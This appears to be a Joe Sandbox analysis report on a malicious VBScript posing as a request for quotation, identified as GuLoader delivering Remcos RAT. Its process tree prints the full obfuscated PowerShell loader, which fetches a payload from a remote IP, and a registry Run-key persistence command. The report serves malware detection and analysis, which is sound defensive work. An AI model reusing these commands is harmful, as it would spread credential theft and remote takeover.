Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RFQ.NO. S70-23Q-1474-CS-P.vbs

Overview

General Information

Sample name:RFQ.NO. S70-23Q-1474-CS-P.vbs
Analysis ID:1428130
MD5:e93e1296b7e4688e847b299faed3bef2
SHA1:b3a6d46e8b062e47efd38e88d85d10125cff102d
SHA256:78a74e42bcf0d0df7cb482f178307235d60fbf59754456c2f742c4510dc83697
Tags:RFQvbs
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected Remcos RAT
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Remcos RAT
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Maps a DLL or memory area into another process
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes many files with high entropy
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 6172 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ.NO. S70-23Q-1474-CS-P.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 5768 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Typhoids213 = 1;$Atrible='Substrin';$Atrible+='g';Function Noncolloid($Offtype){$Focalisation=$Offtype.Length-$Typhoids213;For($Halmknipperne183=6; $Halmknipperne183 -lt $Focalisation; $Halmknipperne183+=(7)){$Eksistensberettigelsers+=$Offtype.$Atrible.Invoke($Halmknipperne183, $Typhoids213);}$Eksistensberettigelsers;}function Skruegangen($Epileptikere){. ($Slagfjedres) ($Epileptikere);}$Totalsaneringens=Noncolloid 'OenophMUnesseoMa,lesz Fastli C,amolRelatil Pud.na F.lmk/Hem el5 Bakk..Ensign0Hepato Lr.rk(feasinWUddriviHalvpunLaanendBltedyoPopulaw pectrsfly,as St alvNIndladTDiapha Kampv1Sygele0Duv,ty.Smaate0T rgiv; Finge So,eneWPokerfiLudd rn elvov6Unwins4Produk;Gastro arylaxD.pped6Bl ker4T veaa;nonval prinrBovensv En ag:Ce.ser1 Bldg.2Coelio1 Sterr.Sellaa0Foreto)Svange LogikpGSub,tieNyhedscOv,ryekMiljstoPan li/Horome2D.ctyl0Wordst1Skibsb0 Vajen0Cascab1 Chubb0 lands1 edest Tsil.F.igsstiDataber Portee Tje efBlendaoBabs nx raspe/Subpet1 ,alst2Ytterp1Terr.s.Append0Datalo ';$Fewterer=Noncolloid 'OutpouUSam ens FinebeValgkarndring-Museo,At.tradgEndagse DriftnconveytH skwo ';$Onomatological=Noncolloid ' Dor khReforgtDepicttGrnsevp Skatt:La,ish/Signal/Egebr.8Flanne7Re.sbg.Garden1fluoar2I.sera1Ov rta.folioa1forret0Vejrud5 galip.Jockey1Alpeho8Overme4Tilfrs/Kil,brFVandreoFusiondKlinkeg Gulvmn ,caphgLipolyeBlkketrMilliboPolya,vstiknaeEristirLandingModbydaBlokf nSubu bgForvalsEncykl.CecostpDentalrBaconimBrordt ';$Raastofforbrugets=Noncolloid 'Tyrann>Erythr ';$Slagfjedres=Noncolloid 'Philosi GlatieVejby xPorch ';$Chlor = Noncolloid ' Rei.seOvnopocKlassihPretaroFael,e Pontif%BoltelaLich.ipValderpL.parodchordaastudeotChefkaaStdfan% Reage\Kom unU Bedfon K,rnipCat.clr.tvrkeeIllapsd TelluiTelephc,ecramtMaalesa.koldnbMehtarl BoheaeByeno,nMalajae Sj.eds F.rbisSermon.kat lyN roteae,etribgCocard Senso.& Abais&Centra TaktikePhot ccskoggehBibelloPhrase Tartuf$pensio ';Skruegangen (Noncolloid 'Skrive$VerdengVomitolLo ninoNonap.bPhraseaFremtilTirriv:NashveS utoyecHurricoSta meuHove arSteno,eMiseresKaritasGodk n=Unburl(Skamskctil,ifmRoyen dNicoti trat/Capablc Splej Timber$TrojkaCKarburh San,rlTreatmo ArtigrKaol,n)Hjkant ');Skruegangen (Noncolloid 'Or,cul$TekstsgIntolelIrett.o Proscb urisda Nonsyl Tyksa:Saf.naTFitc eoOverafpcorrivs MyelolV nfrb=Thespi$BispegOPlo.tenTvehuno.fordem ,aareaUdvandt upersoDik malZuccheoDrejefgParaffiKollidc Afv.saBarytolReklip.Ma lassOmkrsepAfslutlUdludeitid,antudkast(Counte$UddannRgallywaVar.tgaU sletsDoubletSonovooFrdselfTales fDosernoMisdicrUdkli,bf,stprrSpirituReconggOverbaeUninsutPlankssakkvis)Anther ');$Onomatological=$Topsl[0];Skruegangen (Noncolloid 'Photoc$Endop.gBreithlTredivo,tikhvbBe kataRug,ndlPhonsc:Menn.sIRotatis RibieoStaalhtCudgeloS,rupgpHepatoeEch nosRoyalt=GeorgiN In.daeHylarcwS.akor-Tils,dOFo vikbCarancjHalloieWallflcHylop tDisagr AfhngiSOverbeyafmontsFi,bett Mic,ieTruantm Adelh.Exc.llNMaskineDividetU,dsig.,dningWM kroseSfogatbInfiksCpi.kanlRena liInterpeBemurmnIndvaltCrypto ');Skruegangen (Noncolloid 'Tonika$fabulaI Sankts H.ndeoBoligptUdvalgoUnperipArch,ue Cit,osRemrke. ForelHBoretle.oktorabesaaed ,hougeGrmmelrUnnicksStud e[F,itur$L mnopFInfrate Inchaw Ru,dbtSinoloeyhwhcarU kadeeMaskinr Kop l]Anastr=Oinome$SchmeeTBountio onmart,etereaUnderdlUsersks Ro tgaByl,vbnafvaskeValgber TragtiAflusnnUrgedig Red,eeU.dersnBarrels embus ');$Hunched125=Noncolloid 'BullenIHvdstis Martho Nonu tHarm no garosp aempeened assVi dtb. teglvDInurnmoFrilagwProgran ,oponlRetranoudraabaMatrosdSysk iFArtikeiDecelelVagotoeConcoc( brico$QuinquO unautnPit,hpo.eterrmLedemoaOmniact PhysioPres glAalebloInordigPartheiDysoxicRoadcraReva,ulPla sm,Thr.ve$ NoncoH Filmpranfrsed AgesteAnayaclA pelssM usqueMochef)ecdyse ';$Hunched125=$Scouress[1]+$Hunched125;$Hrdelse=$Scouress[0];Skruegangen (Noncolloid 'Niver,$Ched,agSku,apl,asetvoPlanetb M.senaFalketlGauntl:SabianOPleasusRudernsSpndkriSm.ochf g.citlEnerveuty,agteinventnTweedet Hedes=Adfrds( HormoTUsurpme AerobsDeignit Vidun-FumlegPShortcaFaa.ektsampelh Lucar P,dera$comf.sHBrednirvapo.idst,dfseSkib.tl Denatsto,nefe Thre.)Aktivi ');while (!$Ossifluent) {Skruegangen (Noncolloid ' Fe.er$Sk,lnng Al.ehlUptakeo Ho,sebBarkeraC aspalZymoly:S,gnifAIncatenVagnartMaterniJenopetThy.ore.dstanrIndaanrSkraamoAntitorNeust,kS iklio Wanglr NostapSpildpstvrend=Rev rs$Sm.atit DiplorTermoduStifteeBarbas ') ;Skruegangen $Hunched125;Skruegangen (Noncolloid ' Lyk wS .nkamt Episca OvervrLace,at Lys,g-HndervS Skolel,nquiceJanglieAnd.gtptungme Ku.kek4Nummer ');Skruegangen (Noncolloid ' Deifo$Transcg.rugerl Tan,eoScaniabKremloaSheb,alRaflin:VellalOVolderssalgsdsactinoi OpstifMinimul.egatiuPanicle recirnHarmontErhver= ,hame(Micro.TOmstyrePiercesPrimittBi boq-,elysnPTec niaAff litNovellh Stev Unwrat$SignalHuncontrF ldspdHirslee tjlaplWherrisSenioreResoci)Pa.tic ') ;Skruegangen (Noncolloid 'C,ndle$ Parleg RebuclPa madoMaltrabGipsdea St,lnlTrigem:Ge,nemDtawkeer Uvan,iglidenfv nligtPhantasAnlbegrP,ovoseZymosas Squawu DybstlSto pitModsp.aCir ultDecoloe BerigrUnd.rk=Eunuch$Genredg UddanlPirredoCoatimbAfs.nda Ord.nlMultit:BrickbNRevisioTsubodnOverofrtrimoreRntgencEfterlt O ergi DelstfTankf,iR,tschadesoxyb.mkamplMi,ireeFamili+ Abstr+Maskin%Kalcin$ Uig nTDefinio Grea pB.ulkcs hya,nlAnpa.t.Ac.entcTegnino Plastu Brassn jgerstInabed ') ;$Onomatological=$Topsl[$Driftsresultater];}Skruegangen (Noncolloid ' Crede$U.syreg BesvrlHeterooKosherbCaiquea Ron,llForfor:,usareEKrem trTiss mn elefor Cel ui Mo.tenDeviligGaug,asKnirket Finhvi HomoelDagglesRub,nstunbalkapreludn ChiandBipo,sePant gn SkattsFemina Cuem.= Midle ultivGpeanuteGeys.rtunshro-ErklriC SubseoIntercnAmmedetbraknsealfil nHyd.ogtCausre Karak$ElektrHForurer EntopdAffrone NonexlJ ntjespesticeEn iro ');Skruegangen (Noncolloid 'Chizza$ClinodgAlangilBassetoMaternbi,tuitaAmueixlLi ief:CollapPCol uro,andsarArbejdr,istrii ntididApprokgKartotyphotog Data,e=Philip ,umat[KettapSPbeleny damkus BilabtUnfouneJvningmhemsti. J rdbC Ba.reoSnoretn lydskvOveriseSkrmterHovedhtIschia] Tilbe:Chefko: Wen iFZonelorSukkeroSkorpem ,caloBperspeaNewlinsHrebrieIbrugv6Darc.j4 OrrhoSTr,nedtHarberr SubliiDoughnn ,randgBlindl( Press$conserE KlupprSuperinUdviklr Cenobi SupernFleshlglestrasVdderetAkti.li EncyslArterisBiennetUlricha hooglnFleshidPorcele spytsnStolidsAab.nb)Unmesh ');Skruegangen (Noncolloid 'Summem$F.emtrgUrticolGranatoPendl,b.ageevablgesllAvling: SpectIDogmendSomna,e Metinh HemociKonstrsTe,sentEftermoTidsler IrrepiSkrbuge ollisnJurelosT,wnle Yajnav=Sp.net Ha,pul[Te.efoS tabscyKinesesJumpietFlugtseLivsfoma.krft. UnderT ,orhae ogyix StregtMastin.AposteESame,snKlanercSkatteokardusdNongeniForsynn UdslygEndevr] Augus:M,conm:RematrAnewsmaS trabeCOpdeliITr ktoImbaend.FitcheGSurribeHemi it MotivS ougietTvre,trM dianiHrskarnUntem.gFilmsk(Precon$HamdmaPTy dsloQ.ixotrAfsvaerKlareni .rassdKassedg On,ley .rbej)Udenri ');Skruegangen (Noncolloid 'Besti.$riverbg.leasulEfterkoIrr.tabcacopraAnnexelCallgi: Forb.F olyoprSpewereOzo.idmGravemf EuctirOkk.lteNdudga=Do,ing$EupomaIMalaridBriggseUdst,ahIdrtskiAnglomsLiblabtChar coMusikarHeptagiNa coteAftegnnA mangsRelate.LiderlsRullenu Syn.lbFrimrks Triant Raadsr raveliCott.nnUnderagReform(Sylvan3Eviden2 Ree,l2 Indlg3astron5 Urteg9Benytt, Chann2 Secur9Plenis0.artis6Subtr.3 ilbag)Vansir ');Skruegangen $Fremfre;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 2352 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Unpredictableness.Neg && echo $" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 4784 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Typhoids213 = 1;$Atrible='Substrin';$Atrible+='g';Function Noncolloid($Offtype){$Focalisation=$Offtype.Length-$Typhoids213;For($Halmknipperne183=6; $Halmknipperne183 -lt $Focalisation; $Halmknipperne183+=(7)){$Eksistensberettigelsers+=$Offtype.$Atrible.Invoke($Halmknipperne183, $Typhoids213);}$Eksistensberettigelsers;}function Skruegangen($Epileptikere){. ($Slagfjedres) ($Epileptikere);}$Totalsaneringens=Noncolloid 'OenophMUnesseoMa,lesz Fastli C,amolRelatil Pud.na F.lmk/Hem el5 Bakk..Ensign0Hepato Lr.rk(feasinWUddriviHalvpunLaanendBltedyoPopulaw pectrsfly,as St alvNIndladTDiapha Kampv1Sygele0Duv,ty.Smaate0T rgiv; Finge So,eneWPokerfiLudd rn elvov6Unwins4Produk;Gastro arylaxD.pped6Bl ker4T veaa;nonval prinrBovensv En ag:Ce.ser1 Bldg.2Coelio1 Sterr.Sellaa0Foreto)Svange LogikpGSub,tieNyhedscOv,ryekMiljstoPan li/Horome2D.ctyl0Wordst1Skibsb0 Vajen0Cascab1 Chubb0 lands1 edest Tsil.F.igsstiDataber Portee Tje efBlendaoBabs nx raspe/Subpet1 ,alst2Ytterp1Terr.s.Append0Datalo ';$Fewterer=Noncolloid 'OutpouUSam ens FinebeValgkarndring-Museo,At.tradgEndagse DriftnconveytH skwo ';$Onomatological=Noncolloid ' Dor khReforgtDepicttGrnsevp Skatt:La,ish/Signal/Egebr.8Flanne7Re.sbg.Garden1fluoar2I.sera1Ov rta.folioa1forret0Vejrud5 galip.Jockey1Alpeho8Overme4Tilfrs/Kil,brFVandreoFusiondKlinkeg Gulvmn ,caphgLipolyeBlkketrMilliboPolya,vstiknaeEristirLandingModbydaBlokf nSubu bgForvalsEncykl.CecostpDentalrBaconimBrordt ';$Raastofforbrugets=Noncolloid 'Tyrann>Erythr ';$Slagfjedres=Noncolloid 'Philosi GlatieVejby xPorch ';$Chlor = Noncolloid ' Rei.seOvnopocKlassihPretaroFael,e Pontif%BoltelaLich.ipValderpL.parodchordaastudeotChefkaaStdfan% Reage\Kom unU Bedfon K,rnipCat.clr.tvrkeeIllapsd TelluiTelephc,ecramtMaalesa.koldnbMehtarl BoheaeByeno,nMalajae Sj.eds F.rbisSermon.kat lyN roteae,etribgCocard Senso.& Abais&Centra TaktikePhot ccskoggehBibelloPhrase Tartuf$pensio ';Skruegangen (Noncolloid 'Skrive$VerdengVomitolLo ninoNonap.bPhraseaFremtilTirriv:NashveS utoyecHurricoSta meuHove arSteno,eMiseresKaritasGodk n=Unburl(Skamskctil,ifmRoyen dNicoti trat/Capablc Splej Timber$TrojkaCKarburh San,rlTreatmo ArtigrKaol,n)Hjkant ');Skruegangen (Noncolloid 'Or,cul$TekstsgIntolelIrett.o Proscb urisda Nonsyl Tyksa:Saf.naTFitc eoOverafpcorrivs MyelolV nfrb=Thespi$BispegOPlo.tenTvehuno.fordem ,aareaUdvandt upersoDik malZuccheoDrejefgParaffiKollidc Afv.saBarytolReklip.Ma lassOmkrsepAfslutlUdludeitid,antudkast(Counte$UddannRgallywaVar.tgaU sletsDoubletSonovooFrdselfTales fDosernoMisdicrUdkli,bf,stprrSpirituReconggOverbaeUninsutPlankssakkvis)Anther ');$Onomatological=$Topsl[0];Skruegangen (Noncolloid 'Photoc$Endop.gBreithlTredivo,tikhvbBe kataRug,ndlPhonsc:Menn.sIRotatis RibieoStaalhtCudgeloS,rupgpHepatoeEch nosRoyalt=GeorgiN In.daeHylarcwS.akor-Tils,dOFo vikbCarancjHalloieWallflcHylop tDisagr AfhngiSOverbeyafmontsFi,bett Mic,ieTruantm Adelh.Exc.llNMaskineDividetU,dsig.,dningWM kroseSfogatbInfiksCpi.kanlRena liInterpeBemurmnIndvaltCrypto ');Skruegangen (Noncolloid 'Tonika$fabulaI Sankts H.ndeoBoligptUdvalgoUnperipArch,ue Cit,osRemrke. ForelHBoretle.oktorabesaaed ,hougeGrmmelrUnnicksStud e[F,itur$L mnopFInfrate Inchaw Ru,dbtSinoloeyhwhcarU kadeeMaskinr Kop l]Anastr=Oinome$SchmeeTBountio onmart,etereaUnderdlUsersks Ro tgaByl,vbnafvaskeValgber TragtiAflusnnUrgedig Red,eeU.dersnBarrels embus ');$Hunched125=Noncolloid 'BullenIHvdstis Martho Nonu tHarm no garosp aempeened assVi dtb. teglvDInurnmoFrilagwProgran ,oponlRetranoudraabaMatrosdSysk iFArtikeiDecelelVagotoeConcoc( brico$QuinquO unautnPit,hpo.eterrmLedemoaOmniact PhysioPres glAalebloInordigPartheiDysoxicRoadcraReva,ulPla sm,Thr.ve$ NoncoH Filmpranfrsed AgesteAnayaclA pelssM usqueMochef)ecdyse ';$Hunched125=$Scouress[1]+$Hunched125;$Hrdelse=$Scouress[0];Skruegangen (Noncolloid 'Niver,$Ched,agSku,apl,asetvoPlanetb M.senaFalketlGauntl:SabianOPleasusRudernsSpndkriSm.ochf g.citlEnerveuty,agteinventnTweedet Hedes=Adfrds( HormoTUsurpme AerobsDeignit Vidun-FumlegPShortcaFaa.ektsampelh Lucar P,dera$comf.sHBrednirvapo.idst,dfseSkib.tl Denatsto,nefe Thre.)Aktivi ');while (!$Ossifluent) {Skruegangen (Noncolloid ' Fe.er$Sk,lnng Al.ehlUptakeo Ho,sebBarkeraC aspalZymoly:S,gnifAIncatenVagnartMaterniJenopetThy.ore.dstanrIndaanrSkraamoAntitorNeust,kS iklio Wanglr NostapSpildpstvrend=Rev rs$Sm.atit DiplorTermoduStifteeBarbas ') ;Skruegangen $Hunched125;Skruegangen (Noncolloid ' Lyk wS .nkamt Episca OvervrLace,at Lys,g-HndervS Skolel,nquiceJanglieAnd.gtptungme Ku.kek4Nummer ');Skruegangen (Noncolloid ' Deifo$Transcg.rugerl Tan,eoScaniabKremloaSheb,alRaflin:VellalOVolderssalgsdsactinoi OpstifMinimul.egatiuPanicle recirnHarmontErhver= ,hame(Micro.TOmstyrePiercesPrimittBi boq-,elysnPTec niaAff litNovellh Stev Unwrat$SignalHuncontrF ldspdHirslee tjlaplWherrisSenioreResoci)Pa.tic ') ;Skruegangen (Noncolloid 'C,ndle$ Parleg RebuclPa madoMaltrabGipsdea St,lnlTrigem:Ge,nemDtawkeer Uvan,iglidenfv nligtPhantasAnlbegrP,ovoseZymosas Squawu DybstlSto pitModsp.aCir ultDecoloe BerigrUnd.rk=Eunuch$Genredg UddanlPirredoCoatimbAfs.nda Ord.nlMultit:BrickbNRevisioTsubodnOverofrtrimoreRntgencEfterlt O ergi DelstfTankf,iR,tschadesoxyb.mkamplMi,ireeFamili+ Abstr+Maskin%Kalcin$ Uig nTDefinio Grea pB.ulkcs hya,nlAnpa.t.Ac.entcTegnino Plastu Brassn jgerstInabed ') ;$Onomatological=$Topsl[$Driftsresultater];}Skruegangen (Noncolloid ' Crede$U.syreg BesvrlHeterooKosherbCaiquea Ron,llForfor:,usareEKrem trTiss mn elefor Cel ui Mo.tenDeviligGaug,asKnirket Finhvi HomoelDagglesRub,nstunbalkapreludn ChiandBipo,sePant gn SkattsFemina Cuem.= Midle ultivGpeanuteGeys.rtunshro-ErklriC SubseoIntercnAmmedetbraknsealfil nHyd.ogtCausre Karak$ElektrHForurer EntopdAffrone NonexlJ ntjespesticeEn iro ');Skruegangen (Noncolloid 'Chizza$ClinodgAlangilBassetoMaternbi,tuitaAmueixlLi ief:CollapPCol uro,andsarArbejdr,istrii ntididApprokgKartotyphotog Data,e=Philip ,umat[KettapSPbeleny damkus BilabtUnfouneJvningmhemsti. J rdbC Ba.reoSnoretn lydskvOveriseSkrmterHovedhtIschia] Tilbe:Chefko: Wen iFZonelorSukkeroSkorpem ,caloBperspeaNewlinsHrebrieIbrugv6Darc.j4 OrrhoSTr,nedtHarberr SubliiDoughnn ,randgBlindl( Press$conserE KlupprSuperinUdviklr Cenobi SupernFleshlglestrasVdderetAkti.li EncyslArterisBiennetUlricha hooglnFleshidPorcele spytsnStolidsAab.nb)Unmesh ');Skruegangen (Noncolloid 'Summem$F.emtrgUrticolGranatoPendl,b.ageevablgesllAvling: SpectIDogmendSomna,e Metinh HemociKonstrsTe,sentEftermoTidsler IrrepiSkrbuge ollisnJurelosT,wnle Yajnav=Sp.net Ha,pul[Te.efoS tabscyKinesesJumpietFlugtseLivsfoma.krft. UnderT ,orhae ogyix StregtMastin.AposteESame,snKlanercSkatteokardusdNongeniForsynn UdslygEndevr] Augus:M,conm:RematrAnewsmaS trabeCOpdeliITr ktoImbaend.FitcheGSurribeHemi it MotivS ougietTvre,trM dianiHrskarnUntem.gFilmsk(Precon$HamdmaPTy dsloQ.ixotrAfsvaerKlareni .rassdKassedg On,ley .rbej)Udenri ');Skruegangen (Noncolloid 'Besti.$riverbg.leasulEfterkoIrr.tabcacopraAnnexelCallgi: Forb.F olyoprSpewereOzo.idmGravemf EuctirOkk.lteNdudga=Do,ing$EupomaIMalaridBriggseUdst,ahIdrtskiAnglomsLiblabtChar coMusikarHeptagiNa coteAftegnnA mangsRelate.LiderlsRullenu Syn.lbFrimrks Triant Raadsr raveliCott.nnUnderagReform(Sylvan3Eviden2 Ree,l2 Indlg3astron5 Urteg9Benytt, Chann2 Secur9Plenis0.artis6Subtr.3 ilbag)Vansir ');Skruegangen $Fremfre;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 2516 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Unpredictableness.Neg && echo $" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 1848 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • cmd.exe (PID: 4240 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Naergaaende" /t REG_EXPAND_SZ /d "%Trkkerdrengens% -w 1 $Tenementize=(Get-ItemProperty -Path 'HKCU:\Wabbles\').Erende29;%Trkkerdrengens% ($Tenementize)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 2324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • reg.exe (PID: 2404 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Naergaaende" /t REG_EXPAND_SZ /d "%Trkkerdrengens% -w 1 $Tenementize=(Get-ItemProperty -Path 'HKCU:\Wabbles\').Erende29;%Trkkerdrengens% ($Tenementize)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
          • wab.exe (PID: 5772 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\hfdhdzluzzdkgnfkwvintwxsscifq" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 1652 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\hfdhdzluzzdkgnfkwvintwxsscifq" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 7068 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\rzjadswnvivpittonfdpwjkbajsojzmco" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 4220 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\bbote" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    SourceRuleDescriptionAuthorStrings
    0000000F.00000002.1858724524.0000000008DB0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
      0000000F.00000002.1850677246.0000000005F50000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
        00000013.00000003.1861984710.000000002511C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          0000000F.00000002.1859111594.000000000C9DD000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            0000000B.00000002.2227118758.000001C46BE7E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
              Click to see the 3 entries
              SourceRuleDescriptionAuthorStrings
              amsi32_4784.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xe3e9:$b2: ::FromBase64String(
              • 0xd4c2:$s1: -join
              • 0x6c6e:$s4: +=
              • 0x6d30:$s4: +=
              • 0xaf57:$s4: +=
              • 0xd074:$s4: +=
              • 0xd35e:$s4: +=
              • 0xd4a4:$s4: +=
              • 0x1746b:$s4: +=
              • 0x174eb:$s4: +=
              • 0x175b1:$s4: +=
              • 0x17631:$s4: +=
              • 0x17807:$s4: +=
              • 0x1788b:$s4: +=
              • 0xdc8b:$e4: Get-WmiObject
              • 0xde7a:$e4: Get-Process
              • 0xded2:$e4: Start-Process
              • 0x15f7c:$e4: Get-Process

              System Summary

              barindex
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ.NO. S70-23Q-1474-CS-P.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ.NO. S70-23Q-1474-CS-P.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ.NO. S70-23Q-1474-CS-P.vbs", ProcessId: 6172, ProcessName: wscript.exe
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Naergaaende" /t REG_EXPAND_SZ /d "%Trkkerdrengens% -w 1 $Tenementize=(Get-ItemProperty -Path 'HKCU:\Wabbles\').Erende29;%Trkkerdrengens% ($Tenementize)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Naergaaende" /t REG_EXPAND_SZ /d "%Trkkerdrengens% -w 1 $Tenementize=(Get-ItemProperty -Path 'HKCU:\Wabbles\').Erende29;%Trkkerdrengens% ($Tenementize)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 1848, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Naergaaende" /t REG_EXPAND_SZ /d "%Trkkerdrengens% -w 1 $Tenementize=(Get-ItemProperty -Path 'HKCU:\Wabbles\').Erende29;%Trkkerdrengens% ($Tenementize)", ProcessId: 4240, ProcessName: cmd.exe
